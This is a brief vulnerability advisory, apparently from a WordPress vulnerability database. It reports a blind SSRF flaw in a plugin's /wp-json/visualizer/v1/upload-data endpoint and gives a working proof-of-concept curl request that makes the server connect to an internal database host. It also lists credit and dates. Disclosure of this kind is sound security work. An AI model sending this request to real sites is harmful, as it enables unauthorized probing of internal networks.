This plugin suffers from a blind SSRF vulnerability in the /wp-json/visualizer/v1/upload-data endpoint.
curl -i -s -X $'POST' \
-H $'Host: 192.168.158.128:8000' \
--data-binary $'{\"url\":\"http://db:3306\"}' \
$'http://192.168.158.128:8000/wp-json/visualizer/v1/upload-data'
See the references for more details Nathan Davison
No
2019-09-28 (about 3 years ago)
2019-09-28 (about 3 years ago)
2020-09-22 (about 2 years ago)